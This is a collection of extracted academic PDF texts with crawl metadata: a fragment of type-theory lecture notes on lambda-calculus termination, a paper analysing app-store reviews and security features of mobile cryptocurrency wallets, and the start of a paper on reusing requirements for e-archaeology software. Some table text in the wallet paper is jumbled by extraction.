code: good - Named types let type-based code distinguish names: good The theory is often easier and simpler with structural types Termination Surprising fact: If $\vdash e : \tau$ in STLC with all our additions except \texttt{fix}, then there exists a $v$ such that $e \rightarrow^* v$ That is, all programs terminate So termination is trivially decidable (the constant “yes” function), so our language is not Turing-complete The proof requires more advanced techniques than we have learned so far because the size of expressions and typing derivations does not decrease with each program step Non-proof: - Recursion in $\lambda$ calculus requires some sort of self-application - Easy fact: For all $\Gamma$, $x$, and $\tau$, we cannot derive $\Gamma \vdash x \ x : \tau$
{"Source-Url": "https://classes.cs.uoregon.edu/13F/cis624/lec11.pdf", "len_cl100k_base": 6000, "olmocr-version": "0.1.53", "pdf-total-pages": 30, "total-fallback-pages": 0, "total-input-tokens": 55844, "total-output-tokens": 7467, "length": "2e12", "weborganizer": {"__label__adult": 0.0003662109375, "__label__art_design": 0.0003025531768798828, "__label__crime_law": 0.0002658367156982422, "__label__education_jobs": 0.0007638931274414062, "__label__entertainment": 6.61611557006836e-05, "__label__fashion_beauty": 0.00014138221740722656, "__label__finance_business": 0.0001652240753173828, "__label__food_dining": 0.00048470497131347656, "__label__games": 0.0005550384521484375, "__label__hardware": 0.0007052421569824219, "__label__health": 0.0004839897155761719, "__label__history": 0.0002682209014892578, "__label__home_hobbies": 0.0001175999641418457, "__label__industrial": 0.00045561790466308594, "__label__literature": 0.00035953521728515625, "__label__politics": 0.0002536773681640625, "__label__religion": 0.0005869865417480469, "__label__science_tech": 0.01093292236328125, "__label__social_life": 0.00012063980102539062, "__label__software": 0.003131866455078125, "__label__software_dev": 0.978515625, "__label__sports_fitness": 0.0003962516784667969, "__label__transportation": 0.0005645751953125, "__label__travel": 0.00020885467529296875}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 17389, 0.01305]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 17389, 0.27032]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 17389, 0.69909]], "google_gemma-3-12b-it_contains_pii": [[0, 0, null], [0, 906, false], [906, 1350, null], [1350, 2044, null], [2044, 2679, null], [2679, 3472, null], [3472, 4077, null], [4077, 4575, null], [4575, 5610, null], [5610, 6005, null], [6005, 6423, null], [6423, 6865, null], [6865, 7423, null], [7423, 7734, null], [7734, 8337, null], [8337, 8961, null], [8961, 9257, null], [9257, 9590, null], [9590, 10068, null], [10068, 10684, null], [10684, 11343, null], [11343, 11968, null], [11968, 12793, null], [12793, 13396, null], [13396, 14105, null], [14105, 14769, null], [14769, 15684, null], [15684, 16169, null], [16169, 16742, null], [16742, 17389, null]], "google_gemma-3-12b-it_is_public_document": [[0, 0, null], [0, 906, true], [906, 1350, null], [1350, 2044, null], [2044, 2679, null], [2679, 3472, null], [3472, 4077, null], [4077, 4575, null], [4575, 5610, null], [5610, 6005, null], [6005, 6423, null], [6423, 6865, null], [6865, 7423, null], [7423, 7734, null], [7734, 8337, null], [8337, 8961, null], [8961, 9257, null], [9257, 9590, null], [9590, 10068, null], [10068, 10684, null], [10684, 11343, null], [11343, 11968, null], [11968, 12793, null], [12793, 13396, null], [13396, 14105, null], [14105, 14769, null], [14769, 15684, null], [15684, 16169, null], [16169, 16742, null], [16742, 17389, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 17389, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 17389, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 17389, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 17389, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 17389, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 17389, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 17389, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 17389, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 17389, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 17389, null]], "pdf_page_numbers": [[0, 0, 1], [0, 906, 2], [906, 1350, 3], [1350, 2044, 4], [2044, 2679, 5], [2679, 3472, 6], [3472, 4077, 7], [4077, 4575, 8], [4575, 5610, 9], [5610, 6005, 10], [6005, 6423, 11], [6423, 6865, 12], [6865, 7423, 13], [7423, 7734, 14], [7734, 8337, 15], [8337, 8961, 16], [8961, 9257, 17], [9257, 9590, 18], [9590, 10068, 19], [10068, 10684, 20], [10684, 11343, 21], [11343, 11968, 22], [11968, 12793, 23], [12793, 13396, 24], [13396, 14105, 25], [14105, 14769, 26], [14769, 15684, 27], [15684, 16169, 28], [16169, 16742, 29], [16742, 17389, 30]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 17389, 0.0]]}
olmocr_science_pdfs
2024-12-04
2024-12-04
76c975010583c27c31859cb6a93dd34d2423be11
ENHANCING MOBILE CRYPTOCURRENCY WALLETS: A COMPREHENSIVE ANALYSIS OF USER EXPERIENCE, SECURITY, AND FEATURE DEVELOPMENT Richard1*; Muhammad Ammar Marsuki2; Gading Aryo Pamungkas3; Felix Irwanto4 Information Systems Department1,2,3,4 Bina Nusantara University, Indonesia1,2,3,4 https://binus.ac.id/1,2,3,4 richard-slc@binus.edu1*, muhammad.marsuki@binus.ac.id2, gading.pamungkas@binus.ac.id3, felix.irwanto@binus.ac.id4 (*) Corresponding Author (Responsible for the Quality of Paper Content) The creation is distributed under the Creative Commons Attribution-NonCommercial 4.0 International License. Abstract—The surge in cryptocurrency usage has increased reliance on cryptocurrency wallet applications. However, the usability, security, and feature richness of crypto wallets require significant enhancements. This research aims to identify critical factors that should guide the future design of mobile cryptocurrency wallets. The first step was to collect user reviews on several popular crypto wallets as the dataset. A total of 5,466 mobile wallet-related reviews from mobile application stores were filtered and analyzed. A machine-learning approach was used to cluster the user reviews. The analysis shows that customer issues are divided into four main themes: domain-specific challenges, security and privacy concerns, misconceptions, and trust issues. A software process assessment was also conducted to examine the current state of crypto wallets in terms of security, usability, and feature richness. Around 21 crypto wallet platforms were explored and assessed. Based on the thematic analysis and software process assessment, feature recommendations are proposed to address these shortcomings and enhance the credibility of mobile cryptocurrency wallets. Keywords: Crypto wallet, software process assessment, thematic analysis, user experience. INTRODUCTION A cryptocurrency (crypto) wallet is often defined as a software application allowing users to store, manage, and transact crypto assets such as Bitcoin, Ethereum, etc. Crypto wallets establish a unique field as they combine features of password managers, banking applications, and the need for A crypto wallet is considered the primary interface for interacting with the asset in the blockchain. Unlike traditional wallets holding physical currency, crypto wallets do not store crypto assets [2]. Instead, they provide the means to access and interact with the digital assets on blockchain networks. The modern-day crypto wallet allows users to connect to various blockchain networks and switch assets across the network [3]. Technically, a crypto wallet operates by keeping track of private keys used to access cryptocurrency addresses and execute transactions [4]. Based on internet accessibility, crypto wallets can be categorized as online (hot) and offline (cold) wallets. A cold wallet is considered the secure version of a hot wallet, as the wallet is not exposed to the online connection. However, hot wallets are more convenient as they connect directly to the blockchain network. Developing a crypto wallet is tricky as the developer should understand and consider security, usability, and feature richness. Security is crucial to protect sensitive data (private key) and transaction authorizations (signing) in a crypto wallet [5]. Usability can ensure widespread crypto wallet adoption by designing a wallet that understands the needs of new and experienced users. Feature richness drives the crypto wallet beyond its essential functionalities, transforming it into a dynamic tool that enhances the user experience. Balancing these three elements is crucial for creating a wallet that is both secure and user-friendly. Recent scholarly investigations reveal that user experience (UX) research in blockchain-related technologies, including cryptocurrency, lags behind the current advancements in blockchain [6]. The prevalence of financial losses attributed to user misconceptions about the functionalities of crypto wallets serves as substantial evidence to support this observation [7], [8]. In their study, Krombholz et al. conducted a survey focusing on UX within the Bitcoin network, revealing a widespread lack of user understanding about available features, particularly regarding security and privacy, which frequently compromises their anonymity. This gap in understanding may stem from inadequate usability in desktop and mobile-based crypto wallets, especially in executing basic operations. Users often encounter instructions written in overly technical language, which is challenging to comprehend, and they lack clear guidance on troubleshooting steps and problem-solving methods. Since trust is a fundamental motivator among crypto wallet users, these usability issues have a direct and adverse effect on the perceived reliability of these wallets, leading to a disproportionately low usage rate despite high adoption figures [7], [9]. To address general and domain-specific challenges, future wallet designs should incorporate user interfaces that offer comprehensive, user-centered information and implement systems to mitigate financial losses [10], [11]. The urgency of having a crypto wallet is underscored by the imperative need for secure transaction confirmation and safeguarding private key addresses. While keeping security, the crypto wallet should provide an excellent experience for its users. In principle, improving the user experience of crypto wallets increases crypto adoption. Crypto wallet developers should consider the user’s needs when developing the platform. This research aims to deepen the understanding of user perceptions regarding crypto wallets, with the user’s perception poised to become the main driver for the future of crypto wallet design. This research will employ two primary methods: a thematic analysis of user reviews on mobile application stores and a software process assessment of crypto wallets. A detailed examination of various crypto wallet features, usability, and security aspects will be conducted. Through these methodologies, the research intends to provide a comprehensive overview of the current state of crypto wallets. Afterward, the future feature requirements of the crypto wallet will be proposed as the guideline for further development. **MATERIALS AND METHODS** Our research utilizes two approaches to garner comprehensive insights into the crypto wallet. The first approach involves data mining and analysis, leveraging advanced techniques to extract meaningful reviews from the application store. This process allows us to uncover correlations, identify potential challenges, and reveal valuable information that may not be apparent through traditional methods. Concurrently, we employ a software process assessment approach that examines the crypto wallet to evaluate its effectiveness and adherence to security, usability, and feature richness. The synthesis of findings from these two approaches is presented in the results section, providing a cohesive overview of the data-driven insights derived from the analysis and the actionable recommendations from the software process assessment. This comprehensive synthesis offers a nuanced perspective on the interplay... between quantitative data and qualitative process evaluations, enriching our understanding of the studied context and facilitating a well-rounded interpretation of the research outcomes. **Data Mining and Analysis** This research devised a methodical framework for examining the data essential for exploring users’ preferences regarding cryptocurrency wallet features. Data acquisition was conducted through a web scraping technique, targeting user reviews on App Stores. After data collection, a data cleansing phase was initiated, employing various pre-processing methods to distill the data to only that pertinent to the study. To ascertain the reliability and validity of the sampled dataset, the K-Fold validation technique was implemented, a crucial factor influencing the precision of the analysis. The final stage of the methodology involved the application of statistical thematic analysis. The primary objective of this phase was to discern prevalent trends, patterns, and potential challenges specific to mobile cryptocurrency wallets. Source: (Research Results, 2024) reduced to its root form (stemming) to enhance accuracy by minimizing variations in the text. **Feature Extraction** - Four methods were employed to analyze the extensive user reviews of mobile crypto wallets. First, a count vectorizer was used to tally the frequency of specific words and phrases. The significance of each word and phrase was then assessed using the term frequency-inverse document frequency (TF-IDF) technique. Sentiment analysis was performed, assigning scores to reviews from -1 (extremely negative) to 1 (extremely positive) based on the occurrence of positive, negative, and neutral words. Finally, the data was divided into training and testing subsets to evaluate the accuracy of the feature extraction models. **Table 1.** Classified reviews. <table> <thead> <tr> <th>Classification</th> <th>Review Text</th> <th>Explanation</th> </tr> </thead> <tbody> <tr> <td>Related to Cryptocurrency</td> <td>I was caught off guard by the fees. Fees caused a bit of dissatisfaction for the USD but ended up user.</td> <td>The high transaction with just about 75 in my account.</td> </tr> <tr> <td>UX in general</td> <td>With the latest version 1.0.2, crashes are nearly eliminated, but the app still occasionally freezes on startup.</td> <td>Focus on how the application behaves—nothing to do with cryptocurrency.</td> </tr> <tr> <td>Irrelevant to UX</td> <td>I'm hoping this will be my ticket to the moon!</td> <td>Unrelated to the application or the cryptocurrency.</td> </tr> </tbody> </table> Source: (Research Results, 2024) **Training Set** - Out of the 27,934 reviews, a subset of 1,000 reviews was randomly selected for categorization based on their relevance to user experience (UX). In this context, relevance is defined as the review’s pertinence to specific features of mobile cryptocurrency wallets and insights derived from previous research. This categorization process sorts the reviews into three groups: those relevant to cryptocurrency, those about UX in general, and those deemed irrelevant to UX. Table 1 presents each review type’s examples and explanations for their respective classifications. **Machine Learning Model** - After finalizing the training dataset, we employed K-Fold validation to evaluate our machine learning model. Combining our pre-processing techniques, sentiment scoring, and random sampling resulted in an F1 score of 0.74 for reviews related to user experience (UX). The F1 score is a metric in machine learning used to assess a model’s precision. A random binary classifier would have an Area Under the Receiver Operating Characteristic Curve (AUC-ROC) value of 0.5, while a perfect classifier would score 1. Through 10-fold cross-validation, our classifier achieved an average AUC value of 0.84. **Data Analysis** **Thematic Analysis** - The analysis was selected for its proficiency in detecting and isolating data, facilitating the interpretation and formation of patterns [12]. In the subsequent phase, the reviews underwent a batch coding process. This process involved identifying themes within the coded data, each being defined and labeled to represent its essence accurately. As the analysis advanced, these themes were meticulously refined to ensure they precisely mirrored the data’s content. This analytical process culminated in identifying four primary themes: domain-specific issues, security and privacy concerns, misconceptions, and trust aspects. The scope of the analysis was then concentrated on the most pertinent reviews for each theme, culminating in 5,466 reviews. Table 2 details the specific number of reviews selected for each theme from the different wallets. **Table 2.** The count of classified and analyzed reviews for each wallet and platform. <table> <thead> <tr> <th>Wallet Platform</th> <th>Found Reviews</th> <th>Classified Reviews</th> <th>Analyzed Reviews</th> </tr> </thead> <tbody> <tr> <td>Metamask</td> <td>1,794</td> <td>1,498</td> <td>613</td> </tr> <tr> <td>Coinbase</td> <td>2,360</td> <td>2,581</td> <td>1,401</td> </tr> <tr> <td>Coinomi</td> <td>1,692</td> <td>850</td> <td>405</td> </tr> <tr> <td>Trust Wallet</td> <td>16,130</td> <td>4,016</td> <td>1,884</td> </tr> <tr> <td>BlockChain</td> <td>3,958</td> <td>2,761</td> <td>1,163</td> </tr> <tr> <td>Total</td> <td>27,934</td> <td>11,706</td> <td>5,466</td> </tr> </tbody> </table> Source: (Research Results, 2024) **Software Process Assessment** Our software process assessment begins with setting review indicators that focus on security, feature richness, and usability. The following process is choosing samples of wallets, delving down into the features, and exploring the functionalities offered by the wallets to user needs and assessment standards. Usability considerations encompass examining user interfaces, intuitiveness, and overall user experience. Wallet apps are observed in real-time usage scenarios to ensure a holistic assessment. Comprehensive testing is conducted by involving the download and installation of the selected wallet apps. This testing phase examines feature richness, ease of use, and any security issues that might impact user satisfaction. The results of these evaluations are then summarized to contribute valuable insights into the strengths and areas for improvement in non-custodial hot wallet applications. RESULTS AND DISCUSSION This section provides detailed outcomes from the research methodology using thematic analysis and software process assessment. The thematic analysis allowed for the distillation and categorization of critical themes and patterns embedded within the qualitative data, providing a view of intrinsic connections within the dataset. Integration with software process assessment helps gain insight into real case testing scenarios based on a wallet’s usability, feature richness, and security. The results could help build the future architecture of a non-custodial hot crypto wallet. Thematic Analysis Result The thematic analysis revealed four distinct themes, with domain-specific issues emerging as the most prevalent. This was followed by themes related to security and privacy, misconceptions, and trust. Domain-specific - This theme focuses on issues unique to mobile crypto wallets. Our findings indicate a strong user preference for mobile wallets capable of storing multiple currencies. Wallets featuring this functionality typically receive numerous positive reviews. Conversely, poor user interface design is a common critique in the reviews, noted to diminish the overall user experience and, in extreme instances, result in financial loss. Security and Privacy - This was obtained from reviews addressing issues regarding mobile wallets' security and privacy. <table> <thead> <tr> <th>Review Text</th> <th>Insight</th> </tr> </thead> <tbody> <tr> <td>The wallet feels very secure to me thanks to features like password options offered by the protection, biometrics, BIP39 wallet enhances users’ sense of security. Despite never sharing my password, an unknown party accessed my wallet. Customer support responded with a bot, leaving me no choice but to delete the wallet.</td> <td></td> </tr> </tbody> </table> Table 4. Findings in security and privacy theme The reviews highlight the necessity of multiple security measures, particularly emphasizing the importance of second-factor authentication. Additionally, the reviews underline the critical role of customer support in assisting users with issues related to sensitive personal information. Misconception - This theme highlights the drawbacks resulting from user misunderstandings. <table> <thead> <tr> <th>Review Text</th> <th>Insight</th> </tr> </thead> <tbody> <tr> <td>I’ve generally had no problems, except my balance seems really buggy and inaccurate after being displayed transfers. Not sure why that happens.</td> <td>The abundance of negative comments suggests that many that the majority of users people are unfamiliar with how still basic crypto works. The balance takes time to sync with the blockchain. Regarding the high ETH transaction fees, they are not the wallet’s fault; refer to this article [url to article about transaction fee]. It appears that no one is willing to take the time to understand how this technology functions.</td> </tr> </tbody> </table> Table 5. Findings in misconception theme While certain issues arising from misconceptions could be attributed to developer shortcomings, our analysis suggests that the primary cause often lies in the users’ limited understanding of how cryptocurrency functions. Trust - This theme emerges from reviews that reflect users' confidence in the mobile crypto wallet. Table 6. Findings in trust theme <table> <thead> <tr> <th>Review Text</th> <th>Insight</th> </tr> </thead> <tbody> <tr> <td>A wallet you can trust that gives you full control over your earnings</td> <td>Users prefer having more control over their financial assets.</td> </tr> <tr> <td>It’s really frustrating to trust this wallet when there are so many scams</td> <td>The presence of proper customer support greatly impacts user trust.</td> </tr> <tr> <td>involving people pretending to be customer support!</td> <td></td> </tr> </tbody> </table> Source: (Research Results, 2024) Presently, certain mobile wallets exert a degree of indirect control over how customers administer their wallets. Our findings underscore the importance of providing users with maximal autonomy as a key factor in earning their trust. Additionally, the significance of robust customer support is reiterated within this theme. Software Process Assessment Result The foundational aspects of crypto wallets are anchored in four key features. Platform availability ensures accessibility across various devices and operating systems, promoting inclusivity and user adoption. Customizability, another vital factor, empowers users to personalize their wallet interfaces and functionalities, enhancing the overall user experience. On-ramp support is integral for facilitating the seamless conversion of traditional fiat currencies into cryptocurrencies, streamlining the entry process for newcomers. Incorporating a built-in crypto exchange within the wallet simplifies the trading experience. It consolidates various financial activities into a single, user-friendly platform. Figure 4 shows the curated leading crypto wallet primary feature. Only six crypto wallets have all complete basic features defined in the manual survey. Source: (Research Results, 2024) Figure 4. Leading crypto wallet basic features User experience is a cornerstone for crypto wallet adoption. The survey revealed significant elements contributing to a positive user experience. Diverse login methods, such as email authentication, ensure accessibility and strengthen security measures. Multi-protocol connection capability is essential for users managing diverse cryptocurrencies, enabling compatibility across different blockchain networks [13]. Integrating crypto name services through Ethereum Name Service (ENS) or an internal naming service enhances user-friendliness by replacing complex wallet addresses with human-readable names, reducing transaction friction. Figure 5 shows the curated leading crypto wallet with a great user experience. Only four crypto wallets meet all the user experience criteria on the manual survey. Source: (Research Results, 2024) Figure 5. Leading crypto wallet user experience Security is paramount in the crypto space, and our survey unveiled several vital features enhancing wallet security. Multi-Party Computation (MPC) [14] and multi-signature (multi-sig) [15] functionalities employ advanced cryptographic techniques to fortify the security posture of wallets. Maximal extractable value [16] safeguards users against potential financial losses, limiting withdrawal amounts to mitigate risks. Anonymity features prioritize user privacy, addressing concerns within the decentralized landscape. Furthermore, the integration of hardware wallets adds an extra layer of security by keeping private keys offline, reducing susceptibility to online attacks, and bolstering overall confidence in the security of digital assets. Figure 6 shows the curated leading crypto wallet with better security. Currently, no crypto wallets meet all the security criteria on the manual survey. Source: (Research Results, 2024) Figure 6. Leading crypto wallet security Mandatory Features Recommended for Future Design Based on insights derived from the thematic analysis, the incorporation of various features is suggested. Anticipated outcomes from implementing these features include a notable surge in positive reviews relative to negative ones for the application. This shift is expected to assist current and potential users in making informed decisions about adopting the mobile wallet. CONCLUSIONS The data classification identified four themes: domain-specific, security and privacy, misconceptions, and trust. The thematic analysis indicates that several features should be included in future mobile crypto wallets. These features are a well-designed user interface, 24/7 customer support, multi-cryptocurrency support, and two-factor authentication. Since the domain-specific theme was the most frequently identified (see Figure 3), it suggests that a well-designed user interface and multi-cryptocurrency support are the most crucial features for future mobile crypto wallets. Additionally, the other two features mentioned in Figure 7 are highly recommended to enhance trust between users and developers, thereby increasing the wallet’s credibility compared to competitors. The software process assessment has provided valuable insights into the strengths and areas for improvement within the landscape of crypto wallet development. Examining security measures, features, and usability has illuminated the current state of non-custodial hot wallets and laid the groundwork for enhancing overall effectiveness and user experience. The findings from our assessment underscore the importance of continuous improvement in crypto wallet usability and security while emphasizing user-centric features to ensure the long-term viability of crypto wallets. Future research could contribute to designing a crypto wallet architecture that pays attention to improving user experience while enhancing the digital financial ecosystem. REFERENCE [8] A. Voskobojnikov, O. Wiese, M. Mehrabi Koushki, V. Roth, and K. (Kosta) Beznosov,
{"Source-Url": "https://ejournal.nusamandiri.ac.id/index.php/jitk/article/download/5157/1207", "len_cl100k_base": 4404, "olmocr-version": "0.1.53", "pdf-total-pages": 8, "total-fallback-pages": 0, "total-input-tokens": 27829, "total-output-tokens": 6084, "length": "2e12", "weborganizer": {"__label__adult": 0.0012388229370117188, "__label__art_design": 0.001781463623046875, "__label__crime_law": 0.0012607574462890625, "__label__education_jobs": 0.00455474853515625, "__label__entertainment": 0.00092315673828125, "__label__fashion_beauty": 0.0008211135864257812, "__label__finance_business": 0.2449951171875, "__label__food_dining": 0.0010385513305664062, "__label__games": 0.0118408203125, "__label__hardware": 0.00746917724609375, "__label__health": 0.0027523040771484375, "__label__history": 0.00101470947265625, "__label__home_hobbies": 0.0008234977722167969, "__label__industrial": 0.0012845993041992188, "__label__literature": 0.0011701583862304688, "__label__politics": 0.0013446807861328125, "__label__religion": 0.0011510848999023438, "__label__science_tech": 0.26171875, "__label__social_life": 0.000385284423828125, "__label__software": 0.09686279296875, "__label__software_dev": 0.352294921875, "__label__sports_fitness": 0.0007576942443847656, "__label__transportation": 0.00189208984375, "__label__travel": 0.00063323974609375}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 26538, 0.04288]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 26538, 0.03198]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 26538, 0.89008]], "google_gemma-3-12b-it_contains_pii": [[0, 2173, false], [2173, 7253, null], [7253, 8336, null], [8336, 13808, null], [13808, 16905, null], [16905, 21018, null], [21018, 24676, null], [24676, 26538, null]], "google_gemma-3-12b-it_is_public_document": [[0, 2173, true], [2173, 7253, null], [7253, 8336, null], [8336, 13808, null], [13808, 16905, null], [16905, 21018, null], [21018, 24676, null], [24676, 26538, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 26538, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 26538, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 26538, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 26538, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 26538, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 26538, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 26538, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 26538, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 26538, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 26538, null]], "pdf_page_numbers": [[0, 2173, 1], [2173, 7253, 2], [7253, 8336, 3], [8336, 13808, 4], [13808, 16905, 5], [16905, 21018, 6], [21018, 24676, 7], [24676, 26538, 8]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 26538, 0.21053]]}
olmocr_science_pdfs
2024-12-11
2024-12-11
4468f2e373ab0b1a360a506b00c7f28234d9f413
The London Charter and the Seville Principles as sources of requirements for e-archaeology systems development purposes Juan M. Carrillo Gea, Ambrosio Toval, José L. Fernández Alemán, Joaquín Nicolás y Mariano Flores Software Engineering Research Group, Departamento de Informática y Sistemas de la Universidad de Murcia. España. Resumen La Ingeniería de Requisitos (IR) es una disciplina de importancia crítica en el desarrollo de software. Este artículo proporciona un proceso y un conjunto de artefactos software para ayudar en la producción de sistemas de e-arqueología con énfasis en reutilización de requisitos y estándares. En particular, dos guías relevantes en el campo de la e-arqueología, la Carta de Londres y los Principios de Sevilla, se han mostrado como dos fuentes de requisitos a tener en cuenta como punto de partida para el desarrollo de este tipo de sistemas. Palabras Clave: DESARROLLO DE SISTEMAS DE E-ARQUEOLOGÍA, INGENIERÍA DE REQUISITOS, REUTILIZACIÓN, ESTANDARIZACIÓN. Abstract Requirements engineering (RE) is a discipline of critical importance in software development. This paper provides a process and a set of software artefacts to help in the production of e-archaeology systems with emphasis on requirements reuse and standards. In particular, two important guidelines in the field of e-archeology, the London Charter and the Principles of Seville, have been shown as two sources of requirements to be considered as a starting point for developing this type of systems. Key words: E-ARCHAEOLOGY SYSTEMS DEVELOPMENT, REQUIREMENTS ENGINEERING, REUSE, STANDARDIZATION. 1 INTRODUCTION Requirements engineering (RE) proposes the use of repeatable and systematic procedures to ensure obtaining a set of requirements (reqs) which results relevant, complete, consistent and easily understandable and analysable by different stakeholders. According to the Standard Glossary of Software Engineering Terminology IEEE 610, a req is: (a) “a condition or capability needed by a user to solve a problem or achieve an objective”; (b) “condition or capability that must be met or possessed by a system or system component to satisfy a contract, standard, specification, or other formally imposed documents”; or (c) “a documented representation of a condition or capability as in (a) or (b)”. During the RE process, the following activities are performed cyclically: (1) identification and consensus (elicitaiton), (2) analysis and negotiation; (3) documentation (specification); and (4) validation of reqs. Also, an additional activity, reqs management, is often characterised, which refers to schedule, coordination and documentation of the other activities, controlling the changes in reqs. The main objective of RE is to specify what a system has to do, and the design constraints that determine how it should be implemented, with the aim of developing correct software, i.e. software that works according to the customer needs. Hence it seems clear that the construction of a new system or the modification of an existing one should be made based on accurate knowledge of what is to be developed or changed. However, the RE process is often done inappropriately, so that the reqs specification is reduced to a simple, generic mission statement of a few pages many times. All this despite the fact that many empirical studies in the last years support the claim that reqs management is a critical process in the development of correct software. One of the most common causes of runaway and failed projects are unstable reqs, along with making an inadequate estimation of project time and cost (GLASS, 2002). In most cases, instability of reqs is due to the fact that the customer or users do not really know their needs. Many authors point out errors related to reqs as the most expensive to correct when building software. In this sense, the most difficult problem to address is that reqs relevant to the project are not discovered in time. System and software reqs documents play a crucial role in software engineering (SE) in that they must both communicate reqs to customers in an understandable manner and define them in precise detail for developers. Archaeological environments can be seen as a complex socio-technical system with many different stakeholders involved (e.g. heritage managers, archaeologists, conservators, developers, analysts). Besides common reqs concerning any software (basic functionality, quality or security) there are specific e-archaeology domain reqs (constraints imposed by e-archaeology standards, expected or desired specific product functionality). A systematic and rigorous RE approach contributes to obtain interoperable, high-quality e-archaeology systems in a productive way. Using guidelines, recommendations and standards encourages interoperability (common terminology, concepts and procedures) but when these documents are used in a software development context, it is very useful—often necessary—to adapt, refine and express their contents in the form of explicit software and system reqs (see Software Requirements Specifications IEEE Std 830 and System Requirements Specifications IEEE Std 1233). The main contributions of the proposal described in this paper are: (1) definition of an infrastructure for a reusable reqs repository in the e-archaeology realm, integrating common reqs imposed by SE standards (e.g. Software Engineering Product Quality ISO/IEC 9126 or SQuaRe ISO/IEC 25000), e-archaeology guidelines and recommendations, provided by international consortia active in e-archaeology (i.e. the London Charter17 and the Principles of Seville18) and new product reqs; and (2) using the results above, definition of an RE process specific for e-archaeology systems development. The repository of reusable reqs catalogues provides a starting point for the subsequent software development, and supports the definition of e-archaeology software product lines (SPL). This approach is based upon previous work of our research group regarding a broad approach to reqs reuse, named SIREN (SImple REuse of RequiremeNts) (TOVAL, 2002; 2008). After this introduction, Section 2 introduces the SIREN method and the use of formal sources of information for reqs identification; Section 3 presents the infrastructure proposed (artefacts and process) and finally, Section 4 summarizes our conclusions and further work. --- 17 http://www.londoncharter.org/ 18 http://www.arqueologiavirtual.com/carta/ 2 REQUIREMENTS REUSE AND STANDARD GUIDELINES AND RECOMMENDATIONS In order to take advantage of the benefits of reuse at the reqs level, our group proposed the SIREN method, a practical approach for creating, selecting and specifying the reqs of a software system based on reuse and software engineering standards. SIREN encompasses a spiral process model, reqs documents templates, a reusable reqs repository organized by catalogues, and a supporting reqs management tool (SirenTool). These catalogues are organized in a hierarchy of reqs specification documents, which are structured according to IEEE standards (IEEE Std 830, IEEE Std 1233). The textual information of reqs is complemented by a set of attributes. There is a set of attributes common to all reqs (including priority, rationale, source, state, etc.), and additional attributes can be defined. Besides attributes, different traceability relationships can be defined to relate reqs: to sum up, these are inclusive, exclusive and parent-child traceability relationships. SIREN also deals with variability, e.g. through parameterized reqs, which contain some parts that have to be customized and that have to be instantiated when reused, and generic reqs, used as reqs patterns. Standard guidelines and recommendations contain technical specifications which ensure that materials, products, processes, services, systems, or persons are fit for their intended purpose, consequence of the experience both in industry and academy. Standards also provide common concepts and practices that encourage interoperability and technology transfer. However, in many cases these sources express the information in a too general form, sometimes introducing problems associated with natural language usage (e.g. ambiguity, imprecision or inconsistencies), sometimes with very different abstraction level information (all in one place or just lack of detail), making the adoption of these standards and their application difficult. Thus, we think it is necessary to adapt, refine and express their contents in the form of explicit reqs. SIREN catalogues and SIREN reqs structure provide the necessary means to achieve this goal as shown in our previous work in the field of e-learning (TOVAL, 2011; COS, 2012). Currently, the field of e-archaeology is growing very fast. There is a need for establishing solid foundations for this discipline, including both theoretical and practical issues. People involved in computer-based visualisation in the field of cultural heritage are confronted with new technological advances which have to be exploited, whereas barriers and difficulties are to be avoided as well. The London Charter is the most relevant international document dealing with government practices in the field of 3-dimensional visualisation in the research and communication of cultural heritage, and captures basic principles in this growing field. It was proposed by an interdisciplinary panel of researchers belonging to the community of experts in the use of 3-dimensional visualisation technologies in heritage research. There is a need for achieving greater rigour in the projects within the field of cultural heritage. The London Charter is aimed at filling this gap by means of a set of recommendations and specific guidance. Moreover, the London Charter offers “a robust foundation upon which communities of practice can build detailed London Charter Implementation Guidelines”. Given the high amount of valid approaches to the visualisation of cultural heritage and their complexity, specific implementation guidelines for each community of experts should be created. The International Forum of Virtual Archaeology drafted an international document governing the implementation of best practices in computer-based archaeological visualisation. The Principles of Seville followed the London Charter so as to “increase the conditions of applicability of the London Charter in order to improve its implementation specifically in the field of archaeological heritage”. Like its predecessor, this document provides recommendations and guidance, but it is focused on the specific needs of archaeological 